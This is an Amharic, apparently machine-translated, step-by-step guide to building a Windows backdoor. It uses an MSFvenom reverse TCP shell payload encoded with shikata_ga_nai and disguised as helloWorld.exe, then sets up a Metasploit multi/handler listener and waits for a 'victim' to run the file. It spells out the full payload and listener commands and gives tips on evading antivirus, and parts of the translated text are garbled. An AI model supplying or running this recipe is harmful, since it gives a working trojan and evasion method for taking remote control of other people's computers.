የኋላ በር የደህንነት ዘዴዎችን ለማለፍ ያገለግላል ፣ ብዙውን ጊዜ በድብቅ እና በአብዛኛው በማይታወቅ ሁኔታ። MSFvenom ን በመጠቀም ፣ የ msfpayload እና msfencode ጥምረት ፣ የተገላቢጦሽ Tል TCP ን በመጠቀም ከአጥቂው ጋር የሚገናኝ የጀርባ በር መፍጠር ይቻላል። የኋላ በርን ለማልማት ከማንኛውም የፀረ -ቫይረስ ሶፍትዌር ለማምለጥ ተንኮል አዘል ዌርዎን ፊርማ መለወጥ ያስፈልግዎታል። እርስዎ ለመድረስ ፈቃድ ባላቸው ጥንድ ኮምፒውተሮች ላይ ይህንን ፕሮጀክት ያጠናቅቁ ፣ እና በሂደቱ ውስጥ ስለኮምፒዩተር ደህንነት እና የዚህ ዓይነቱ የኋላ በር እንዴት እንደሚሠራ የበለጠ ይማራሉ።
ደረጃዎች
ደረጃ 1. ካሊውን ያስጀምሩ እና ተርሚናል ኮንሶሉን ያቃጥሉ።
ደረጃ 2. በይነገጽን ለማሳየት ifconfig ብለው ይተይቡ እና የአይፒ አድራሻዎን ይፈትሹ።
ደረጃ 3. የአቃፊዎችን ዝርዝር ለማሳየት msfvenom -l ኢንኮደሮችን ይተይቡ።
X86/shikata_ga_nai እንደ መቀየሪያ ይጠቀማሉ።
ደረጃ 4. "msfvenom -a x86 -windows -p windows/shell/revers_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe ብለው ይተይቡ
- -a x86 -የመድረክ መስኮቶች ለመጠቀም ሥነ ሕንፃን ይመድባሉ።
- -p መስኮቶች/shellል/revers_tcp ለመክፈል የደመወዝ ጭነቶችን ይሰይማል።
- LHOST የአድማጩን አይፒ አድራሻ ይሰይማል።
- LPORT የአድማጭ ወደብን ይመድባል።
- -b "\ x00" መጥፎ ገጸ -ባህሪን (ባዶ ባይት) ለማስወገድ ይመድባል።
- -e x86/shikata_ga_nai የኢኮደሮችን ስም ይሰይማል።
- -f exe> helloWorld.exe የቅርጸት ውፅዓት ያሳያል።
ደረጃ 5. Metasploit ን ለማግበር msfconsole ይተይቡ።
አሁን የኋላ በርዎን ፈጥረዋል። ተጎጂው helloWorld.exe ላይ ጠቅ ሲያደርግ ፣ የተከተተው የ shellል የክፍያ ጭነት ገቢር ይሆናል እና ወደ ስርዓትዎ ይመለሳል። ግንኙነቱን ለመቀበል በሜታፕሎፕ ውስጥ ባለ ብዙ መቆጣጠሪያውን መክፈት እና የክፍያ ጭነቶችን ማዘጋጀት አለብዎት።
ደረጃ 6. ዓይነት አጠቃቀም ብዝበዛ/ባለብዙ/ተቆጣጣሪ ይተይቡ።
ደረጃ 7. የክፍያ ጭነት መስኮቶችን/shellል/revers_tcp ን ይተይቡ።
ደረጃ 8. ሞጁሉን ለመፈተሽ የማሳያ አማራጮችን ይተይቡ።
ደረጃ 9. ዓይነት አዘጋጅ LHOST 192.168.48.129።
“LHOST” የአድማጩን አይፒ አድራሻ ይሰይማል።
ደረጃ 10. ዓይነት አዘጋጅ LPORT 4444
"LPORT" የአድማጭ ወደብን ይሰይማል።
ደረጃ 11. ሩጫውን ይተይቡ እና ግንኙነቱን ከተጎጂው ማሽን ይጠብቁ።
ደረጃ 12. ተጎጂው helloWorld.exe ላይ ጠቅ እስኪያደርግ ድረስ ይጠብቁ።
ከዚያ በተሳካ ሁኔታ ከተጎጂው ማሽን ጋር ይገናኛሉ።
ጠቃሚ ምክሮች
- በ MSFvenom ውስጥ -i ን መጠቀም የኢኮዲንግ ድግግሞሾችን ይወክላል። አንዳንድ ጊዜ ብዙ ድግግሞሽ የኤቪ ሶፍትዌርን ለማምለጥ ሊረዱ ይችላሉ።
- MSFvenom ን በመጠቀም የኋላውን በር እና ኢንኮዲንግን እንዴት እንደሚያመነጩ ተምረዋል ፣ ግን ይህ ዘዴ በአሁኑ ጊዜ በአንዳንድ የኤቪ ሶፍትዌር ላይ ፍጹም አይሰራም። ከዚህ በስተጀርባ ያለው ምክንያት በ MSFvenom ውስጥ በአፈጻጸም አብነቶች ምክንያት ነው። የኤቪ አከፋፋዮች የእነዚህን አብነቶች የማይንቀሳቀስ ፊርማ አክለው ልክ ይፈልጉዋቸው። ለዚህ ጉዳይ መፍትሔው የተለየ የማስፈጸሚያ አብነት ወይም የተለያዩ መሳሪያዎችን መጠቀም ነው።